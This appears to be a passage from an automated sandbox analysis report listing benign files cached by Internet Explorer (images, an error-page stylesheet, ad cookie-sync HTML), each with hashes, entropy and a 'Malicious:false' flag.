                                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 206x250, frames 3
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):4394
                                                                                                                                                                                                                                  Entropy (8bit):7.030110019355473
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:Qf5uETAGK88888Z1sHvq2WNK0NVuwmS9CapNiWWWWd:QfQE9GHz0/mSTpNiWWWWd
                                                                                                                                                                                                                                  MD5:16BDA1AE195B38579F194CD823D801F8
                                                                                                                                                                                                                                  SHA1:A216736D1818913D2856B46D4FFB45661105AC34
                                                                                                                                                                                                                                  SHA-256:5923487B64BB2CE31EE68CAC5C68C4FF3992EC21AC7135CA9C84293E3FD711BC
                                                                                                                                                                                                                                  SHA-512:6C95E99091B76DE8994405AB13BE73427534B83A858FA6B9929419858935B30BBC1686BB60094FA82585646B07497FF83F5777F13CBC5F3D0B0E7DE68382415E
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0MX4YUS9\AAOgJ6C[1].jpg
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 311x333, frames 3
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):9430
                                                                                                                                                                                                                                  Entropy (8bit):7.764531777068338
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:Q2sGHXqF6UeKGo3/VvhzFYjSpwT5B9sYDlCLBoSvRqg5ej4zKiAUH0Y8:NsG3qHP5/VvZFYjVsYDluAg5ej4zJAew
                                                                                                                                                                                                                                  MD5:DA3EF5D61CFCF919A9B3C8244CF1A338
                                                                                                                                                                                                                                  SHA1:6D13CC7968F716BC4A4B44DA6B48D5C5156A2A82
                                                                                                                                                                                                                                  SHA-256:26783E83884E406E82D42417274A97129D68F717B29B64D844397BDDF412634C
                                                                                                                                                                                                                                  SHA-512:BF62219E2BD0B0D261594B1E9597E30C695B661AE3BC59F62CB4770FE0F9D3539063B23C4B9B357FF33C360AEDCAA2A13C228046BD5BBE66D2A591E3EA511C72
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0MX4YUS9\AAOgLtL[1].jpg
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 311x333, frames 3
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):12204
                                                                                                                                                                                                                                  Entropy (8bit):7.760356414393578
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:Q2ocxYvdubJzbjF4rcDHiz3U68cXNsT0t16iDUVVH6Gb029cbDc1+fCYyGqqpo2r:NosSuF3WggFk0tgioVV0dCYyGXn11sA/
                                                                                                                                                                                                                                  MD5:809C75ECB371E6428E0D21641C6758FD
                                                                                                                                                                                                                                  SHA1:06EF08CCC013EFF1AAD201C7F1BD3C288350B274
                                                                                                                                                                                                                                  SHA-256:3B7A81B0CEC9930FDAF2EE0BDCBD475ED69656DF7237B4795C8B021E3A71A725
                                                                                                                                                                                                                                  SHA-512:52D3EDCD559F525D6E941E63D88CC243A0F11212D7172AA089B672505D9DB94DB68BE1300E9BAB00D150E1E644891999483FFBDF0791E8E2EE8ECBA66E25D81F
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0MX4YUS9\AAOgbmq[1].jpg
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 206x250, frames 3
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):6289
                                                                                                                                                                                                                                  Entropy (8bit):7.851523332145787
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:QfQErg7WA8UKQ9FQeAAdE7XqMnyVvzoTUtmnw66zfMcg84pGEuji9zoybBbqr:Qoag7WA8liF669N36eEtjpG9jFY2
                                                                                                                                                                                                                                  MD5:07F426B9CCD868F4A649262096340195
                                                                                                                                                                                                                                  SHA1:0FBB15A464AA610660FA0C4FC0DC541AF1714797
                                                                                                                                                                                                                                  SHA-256:D2CB2DD7DAE25A68EFB5F3365A6ECCF7D1754A497FA0CB933DF6753E395A5CB9
                                                                                                                                                                                                                                  SHA-512:5E79975D852BF819A942CD6FAE7744AD75A081EC1562F4F243CD01B86B5CCECEF7976D239AED3D30A215922D5CD239F329BA2E970364365571C8CB7CDD833B2C
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0MX4YUS9\AAOgg4w[1].jpg
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 622x368, frames 3
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):34427
                                                                                                                                                                                                                                  Entropy (8bit):7.918466298596994
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:I+HFDaHrcAEP0XopJxu7HSOGTD4GO23d7IGbKjfGZ:I+BaHTEP0+JxEHyDs23d8sKSZ
                                                                                                                                                                                                                                  MD5:8A893F65E7371978DBB67255A0EC14C2
                                                                                                                                                                                                                                  SHA1:E718E3AABA11B0D5879A00C27DAA901F93D2A7B5
                                                                                                                                                                                                                                  SHA-256:4DB575F619B4A904FA76FC2F85A217971B39FD20B61B3779C9D4FF6701984D44
                                                                                                                                                                                                                                  SHA-512:AD3D6E1A48D2F2E59B2516F563CB31E586BEE00C47F2B85E6B95D31ECDC77703FBA4E4A477EB5E4C98B3975195EBA296436DB03C25D49DEEEF774F886B13DF93
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0MX4YUS9\AAOggwL[1].jpg
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 206x250, frames 3
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):12998
                                                                                                                                                                                                                                  Entropy (8bit):7.957875205331213
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:bOhTptS/mgGPq4AQF+2SK2Fdtlr0voY49wNPci77P:bOhbSugGPq4zFotlr0uIP
                                                                                                                                                                                                                                  MD5:1D942C6E3EDD1A02F198321F9F653842
                                                                                                                                                                                                                                  SHA1:CB8A9BCC50B7001222AA6ED0070701A91E8D48E1
                                                                                                                                                                                                                                  SHA-256:8C71199E78444BF4AF8F2FB06A29084CB7A3B79605DC8C7027A01AE146BCDCC2
                                                                                                                                                                                                                                  SHA-512:245C76AFABA723A5F404DBEF1FDAA3A35B97D58B9C0A5AF4467D64E4821A0B8A9CF8BCF4E46145A9E39D224C996AC06A4D625BDF21C0DBD6C5C027B70AA3D37E
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0MX4YUS9\AAOgkHA[1].jpg
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 206x250, frames 3
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):8589
                                                                                                                                                                                                                                  Entropy (8bit):7.917883695837637
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:Qo6znNwgr1T/regmhcvAa31b1TMu2UQa9uQEEa1Wkfq1:b6znNvRzycvj1TMurxET1bfq1
                                                                                                                                                                                                                                  MD5:464362B49496E353AABF75DA5015B426
                                                                                                                                                                                                                                  SHA1:51C5A1291B3B5746BB5602CD19F68ABA7FFCC838
                                                                                                                                                                                                                                  SHA-256:3F86873DB8AF0970856EE5493C1712D11444B75DA21B3F90E27495BA0AA4B943
                                                                                                                                                                                                                                  SHA-512:D51C63F9D6296FF7035B1D5AFA7973E22250B5A36CB56834F09045ABF87950B4F5F94763578D833B27626AA3981CE0C679C6730AE10CC248CD723E8F5645E2C1
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0MX4YUS9\BB14EN7h[1].jpg
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 622x368, frames 3
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):13764
                                                                                                                                                                                                                                  Entropy (8bit):7.273450351118404
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:IfOm4cIa37nstlEM15mv7OAkrIh4McOD07+8n0GoJdxFhEh8:I2m4pa37stlTgqAjS0GoJd3yK
                                                                                                                                                                                                                                  MD5:DA6531188AED539AF6EAA0F89912AACF
                                                                                                                                                                                                                                  SHA1:602244816EA22CBE39BBD4DB386519908745D45C
                                                                                                                                                                                                                                  SHA-256:C719BE5FFC45680FE2A18CDB129E60A48A27A6666231636378918B4344F149F7
                                                                                                                                                                                                                                  SHA-512:DF03FA1CB6ED0D1FFAC5FB5F2BB6523D373AC4A67CEE1AAF07E0DA61E3F19E7AF43673B6BEFE7192648AC2531EF64F6B4F93F941BF014ED2791FA6F46720C7DB
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0MX4YUS9\BB14hq0P[1].jpg
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 622x368, frames 3
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):19135
                                                                                                                                                                                                                                  Entropy (8bit):7.696449301996147
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:IHtFIzAsGkT2tP9ah048vTWjczBRfCghSyOaWLxyAy3FN5GU643lb1y6N0:INFIFTsEG46SjcbmaWLsR3FNY/Ayz
                                                                                                                                                                                                                                  MD5:01269B6BB16F7D4753894C9DC4E35D8C
                                                                                                                                                                                                                                  SHA1:B3EBFE430E1BBC0C951F6B7FB5662FEB69F53DEE
                                                                                                                                                                                                                                  SHA-256:D3E92DB7FBE8DF1B9EA32892AD81853065AD2A68C80C50FB335363A5F24D227D
                                                                                                                                                                                                                                  SHA-512:0AF92FBC8D3E06C3F82C6BA1DE0652706CA977ED10EEB664AE49DD4ADA3063119D194146F2B6D643F633D48AE7A841A14751F56CC41755B813B9C4A33B82E45C
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0MX4YUS9\BB1aXBV1[1].png
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:PNG image data, 27 x 27, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1161
                                                                                                                                                                                                                                  Entropy (8bit):7.80841974432226
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:zxxmempCXfPZq+DLeP1cRwZFIjvh3wuiFZMrFYzWkG4iD3w:zxRBXfB9k1cRuFIbJWsFYT/2w
                                                                                                                                                                                                                                  MD5:D858BE67BEA11BF5CEC1B2A6C1C1F395
                                                                                                                                                                                                                                  SHA1:6090B195BEF6AF1157654048EECEA81E2DCEC42A
                                                                                                                                                                                                                                  SHA-256:FC7CF2E8592C8E63CFF72530DA560E3293EC2DE3732823DBAEB4464609EA0494
                                                                                                                                                                                                                                  SHA-512:180FA05957A2FCF8192006D5F8E8D3E4DE1D79DD6F9F100D254C513068FC291B3086DE9A8897B3658D83FE3335FDEB4023F13AC3A6A8A507729AE22B621EC7D7
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0MX4YUS9\BB1cG73h[1].png
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:PNG image data, 27 x 27, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1131
                                                                                                                                                                                                                                  Entropy (8bit):7.767634475904567
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:lGH0pUewXx5mbpLxMkes8rZDN+HFlCwUntvB:JCY9xr4rZDEFC
                                                                                                                                                                                                                                  MD5:D1495662336B0F1575134D32AF5D670A
                                                                                                                                                                                                                                  SHA1:EF841C80BB68056D4EF872C3815B33F147CA31A8
                                                                                                                                                                                                                                  SHA-256:8AD6ADB61B38AFF497F2EEB25D22DB30F25DE67D97A61DC6B050BB40A09ACD76
                                                                                                                                                                                                                                  SHA-512:964EE15CDC096A75B03F04E532F3AA5DCBCB622DE5E4B7E765FB4DE58FF93F12C1B49A647DA945B38A647233256F90FB71E699F65EE289C8B5857A73A7E6AAC6
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0MX4YUS9\BB1ftEY0[1].png
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):497
                                                                                                                                                                                                                                  Entropy (8bit):7.316910976448212
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:12:6v/7YEtTvpTjO7q/cW7Xt3T4kL+JxK0ew3Jw61:rEtTRTj/XtjNSJMkJw61
                                                                                                                                                                                                                                  MD5:7FBE5C45678D25895F86E36149E83534
                                                                                                                                                                                                                                  SHA1:173D85747B8724B1C78ABB8223542C2D741F77A9
                                                                                                                                                                                                                                  SHA-256:9E32BF7E8805F283D02E5976C2894072AC37687E3C7090552529C9F8EF4DB7C6
                                                                                                                                                                                                                                  SHA-512:E9DE94C6F18C3E013AB0FF1D3FF318F4111BAF2F4B6645F1E90E5433689B9AE522AE3A899975EAA0AECA14A7D042F6DF1A265BA8BC4B7F73847B585E3C12C262
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0MX4YUS9\BB7hjL[1].png
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):462
                                                                                                                                                                                                                                  Entropy (8bit):7.383043820684393
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:12:6v/7FMgL0KPV1ALxcVgmgMEBXu/+vVIIMhZkdjWu+7cW1T4:kMgoyocsOmIZIl+7cW1T4
                                                                                                                                                                                                                                  MD5:F810C713C84F79DBB3D6E12EDBCD1A32
                                                                                                                                                                                                                                  SHA1:09B30AB856BFFDB6AABE09072AEF1F6663BA4B86
                                                                                                                                                                                                                                  SHA-256:6E3B6C6646587CC2338801B3E3512F0C293DFF2F9540181A02C6A5C3FE1525A2
                                                                                                                                                                                                                                  SHA-512:236A88BD05EAF210F0B61F2684C08651529C47AA7DCBCD3575B067BEDCA1FBEE72E260441B4EAD45ABE32354167F98521601EA21DDF014FF09113EC4C0D9D798
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0MX4YUS9\BBY7ARN[1].png
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):779
                                                                                                                                                                                                                                  Entropy (8bit):7.670456272038463
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:dYsfeTaIfpVFdpxXMyN2fFIKdko2boYfm:Jf5ILpCyN29lC5boD
                                                                                                                                                                                                                                  MD5:30801A14BDC1842F543DA129067EA9D8
                                                                                                                                                                                                                                  SHA1:1900A9E6E1FA79FE3DF5EC8B77A6A24BD9F5FD7F
                                                                                                                                                                                                                                  SHA-256:70BB586490198437FFE06C1F44700A2171290B4D2F2F5B6F3E5037EAEBC968A4
                                                                                                                                                                                                                                  SHA-512:8B146404DE0C8E08796C4A6C46DF8315F7335BC896AF11EE30ABFB080E564ED354D0B70AEDE7AF793A2684A319197A472F05A44E2B5C892F117B40F3AF938617
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0MX4YUS9\BBkwUr[1].png
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):436
                                                                                                                                                                                                                                  Entropy (8bit):7.255906495097201
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:6:6v/lhPahm/BBjoPHhOVDqpp05cMxyHtGUmmozY7JE3R+hRMCzRPasXQc01UaVesl:6v/7MHQg25b8Ht3VEMNQ2w5
                                                                                                                                                                                                                                  MD5:01B5E74F991A886215461BF0057008C7
                                                                                                                                                                                                                                  SHA1:6A7347C3559814722D7AA4D491A0D754E157FCC5
                                                                                                                                                                                                                                  SHA-256:DB8A0C0A44AEE824F689A942D99802F95D7950758CB0739C7F179624A592CD51
                                                                                                                                                                                                                                  SHA-512:17820A7C90B35B0E45D0A07F5445D8C97BFD3098FD9E0F0283CD6CFC1DB2B33C651924D2F04EF398C147CEB8D7DEA3F591DBC19F9039279407C4E4231AC5F5B7
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0MX4YUS9\NewErrorPageTemplate[1]
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1612
                                                                                                                                                                                                                                  Entropy (8bit):4.869554560514657
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:5Y0bQ573pHpACtUZtJD0lFBopZleqw87xTe4D8FaFJ/Doz9AtjJgbCzg:5m73jcJqQep89TEw7Uxkk
                                                                                                                                                                                                                                  MD5:DFEABDE84792228093A5A270352395B6
                                                                                                                                                                                                                                  SHA1:E41258C9576721025926326F76063C2305586F76
                                                                                                                                                                                                                                  SHA-256:77B138AB5D0A90FF04648C26ADDD5E414CC178165E3B54A4CB3739DA0F58E075
                                                                                                                                                                                                                                  SHA-512:E256F603E67335151BB709294749794E2E3085F4063C623461A0B3DECBCCA8E620807B707EC9BCBE36DCD7D639C55753DA0495BE85B4AE5FB6BFC52AB4B284FD
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  Preview: .body..{.. background-repeat: repeat-x;.. background-color: white;.. font-family: "Segoe UI", "verdana", "arial";.. margin: 0em;.. color: #1f1f1f;..}.....mainContent..{.. margin-top:80px;.. width: 700px;.. margin-left: 120px;.. margin-right: 120px;..}.....title..{.. color: #54b0f7;.. font-size: 36px;.. font-weight: 300;.. line-height: 40px;.. margin-bottom: 24px;.. font-family: "Segoe UI", "verdana";.. position: relative;..}.....errorExplanation..{.. color: #000000;.. font-size: 12pt;.. font-family: "Segoe UI", "verdana", "arial";.. text-decoration: none;..}.....taskSection..{.. margin-top: 20px;.. margin-bottom: 28px;.. position: relative; ..}.....tasks..{.. color: #000000;.. font-family: "Segoe UI", "verdana";.. font-weight:200;.. font-size: 12pt;..}....li..{.. margin-top: 8px;..}.....diagnoseButton..{.. outline: none;.. font-size: 9pt;..}.....launchInternetOptionsButton..{.. outline: none;
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0MX4YUS9\a5ea21[1].ico
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:PNG image data, 32 x 32, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):758
                                                                                                                                                                                                                                  Entropy (8bit):7.432323547387593
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:12:6v/792/6TCfasyRmQ/iyzH48qyNkWCj7ev50C5qABOTo+CGB++yg43qX4b9uTmMI:F/6easyD/iCHLSWWqyCoTTdTc+yhaX4v
                                                                                                                                                                                                                                  MD5:84CC977D0EB148166481B01D8418E375
                                                                                                                                                                                                                                  SHA1:00E2461BCD67D7BA511DB230415000AEFBD30D2D
                                                                                                                                                                                                                                  SHA-256:BBF8DA37D92138CC08FFEEC8E3379C334988D5AE99F4415579999BFBBB57A66C
                                                                                                                                                                                                                                  SHA-512:F47A507077F9173FB07EC200C2677BA5F783D645BE100F12EFE71F701A74272A98E853C4FAB63740D685853935D545730992D0004C9D2FE8E1965445CAB509C3
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0MX4YUS9\aMt[1].avi
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):5
                                                                                                                                                                                                                                  Entropy (8bit):2.321928094887362
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3:3:3
                                                                                                                                                                                                                                  MD5:5BFA51F3A417B98E7443ECA90FC94703
                                                                                                                                                                                                                                  SHA1:8C015D80B8A23F780BDD215DC842B0F5551F63BD
                                                                                                                                                                                                                                  SHA-256:BEBE2853A3485D1C2E5C5BE4249183E0DDAFF9F87DE71652371700A89D937128
                                                                                                                                                                                                                                  SHA-512:4CD03686254BB28754CBAA635AE1264723E2BE80CE1DD0F78D1AB7AEE72232F5B285F79E488E9C5C49FF343015BD07BB8433D6CEE08AE3CEA8C317303E3AC399
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  Preview: 0....
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0MX4YUS9\checksync[3].htm
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:HTML document, ASCII text, with very long lines
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):21628
                                                                                                                                                                                                                                  Entropy (8bit):5.304819777739522
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:3OAGcVXlblcqnzleZSweg2f5ng+7naMHF3OZOfQWwY4RXrqt:I86qhbS2RpF3OsfQWwY4RXrqt
                                                                                                                                                                                                                                  MD5:DDD356C3D15DF3F06EF6772D05ED53D7
                                                                                                                                                                                                                                  SHA1:4A34AC5B1AD6F7B7A960AA55405625CD60BF4FE6
                                                                                                                                                                                                                                  SHA-256:62812A69A8398073B8F53B582C04B6FD214D07146A580035611F646E74922398
                                                                                                                                                                                                                                  SHA-512:9C8C6264D621A6D2EEA15B1BB627D221ABA1CB367030137B00B440E50CB1641B623C6A7E0C49220D2B35AAE93D1DEA4E819046982808BE596CAB7619E947D473
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  Preview: <html> <head></head> <body> <script type="text/javascript">try{.var cookieSyncConfig = {"datalen":80,"visitor":{"vsCk":"visitor-id","vsDaCk":"data","sepVal":"|","sepTime":"*","sepCs":"~~","vsDaTime":31536000,"cc":"CH","zone":"d"},"cs":"1","lookup":{"g":{"name":"g","cookie":"data-g","isBl":1,"g":1,"cocs":0},"vzn":{"name":"vzn","cookie":"data-v","isBl":1,"g":0,"cocs":0},"brx":{"name":"brx","cookie":"data-br","isBl":1,"g":0,"cocs":0},"lr":{"name":"lr","cookie":"data-lr","isBl":1,"g":1,"cocs":0},"ttd":{"name":"ttd","cookie":"data-ttd","isBl":1,"g":1,"cocs":0}},"ussyncmap":[],"hasSameSiteSupport":"0","batch":{"gGroups":["apx","csm","ppt","rbcn","son","bdt","con","opx","tlx","mma","c1x","ys","sov","fb","r1","g","pb","dxu","rkt","trx","wds","crt","ayl","bs","ui","shr","lvr","yld","msn","zem","dmx","pm","som","adb","tdd","soc","adp","vm","spx","nat","ob","adt","got","mf","emx","sy","lr","ttd"],"bSize":2,"time":30000,"ngGroups":[]},"log":{"successLper":10,"failLper":10,"logUrl":{"cl":"https:\/\
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0MX4YUS9\checksync[4].htm
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:HTML document, ASCII text, with very long lines
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):21628
                                                                                                                                                                                                                                  Entropy (8bit):5.304819777739522
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:3OAGcVXlblcqnzleZSweg2f5ng+7naMHF3OZOfQWwY4RXrqt:I86qhbS2RpF3OsfQWwY4RXrqt
                                                                                                                                                                                                                                  MD5:DDD356C3D15DF3F06EF6772D05ED53D7
                                                                                                                                                                                                                                  SHA1:4A34AC5B1AD6F7B7A960AA55405625CD60BF4FE6
                                                                                                                                                                                                                                  SHA-256:62812A69A8398073B8F53B582C04B6FD214D07146A580035611F646E74922398
                                                                                                                                                                                                                                  SHA-512:9C8C6264D621A6D2EEA15B1BB627D221ABA1CB367030137B00B440E50CB1641B623C6A7E0C49220D2B35AAE93D1DEA4E819046982808BE596CAB7619E947D473
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
